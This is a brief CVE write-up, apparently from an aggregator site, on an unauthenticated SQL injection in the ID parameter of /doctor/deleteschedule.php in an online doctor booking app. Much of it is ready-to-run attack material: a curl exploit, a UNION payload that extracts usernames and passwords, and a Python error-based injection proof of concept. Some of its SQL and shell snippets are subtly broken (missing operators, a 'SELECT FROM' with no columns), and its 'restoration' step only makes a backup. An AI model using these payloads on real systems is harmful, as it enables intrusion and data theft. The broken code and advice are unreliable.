How the CVE Works
The vulnerability exists in `/doctor/deleteschedule.php` due to improper sanitization of the `ID` parameter, allowing attackers to inject malicious SQL queries. When a crafted request is sent, the backend database executes unintended commands, potentially enabling unauthorized data access, modification, or deletion. The flaw is remotely exploitable without authentication, making it critical. Attackers leverage input manipulation to bypass security checks, exploiting weak input validation in the PHP script.
DailyCVE Form
Platform: Projectworlds Online Doctor Booking
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 04/08/2025
What Undercode Say:
Exploitation:
curl -X POST "http://target.com/doctor/deleteschedule.php" -d "ID=1' OR 1=1--"
SQL Payload:
1' UNION SELECT username, password FROM users--
Detection (Log Analysis):
grep -i "deleteschedule.php?ID=.'" /var/log/apache2/access.log
Mitigation:
1. Patch: Apply vendor updates.
2. Input Sanitization:
$id = mysqli_real_escape_string($conn, $_POST['ID']);
3. WAF Rule:
location ~ deleteschedule.php {
deny all;
}
4. Database Hardening:
REVOKE DELETE ON appointments FROM 'webuser'@'%';
Exploit PoC (Python):
import requests
url = "http://victim.com/doctor/deleteschedule.php"
payload = {"ID": "1' AND (SELECT 1 FROM(SELECT COUNT(),CONCAT(user(),0x3a,FLOOR(RAND(0)2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)--"}
r = requests.post(url, data=payload)
print(r.text)
Post-Exploit Analysis:
SELECT FROM mysql.general_log WHERE argument LIKE '%deleteschedule%';
Backup Restoration (If Compromised):
mysqldump -u root -p --all-databases > backup.sql
End.
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-3180
Extra Source Hub:
Undercode
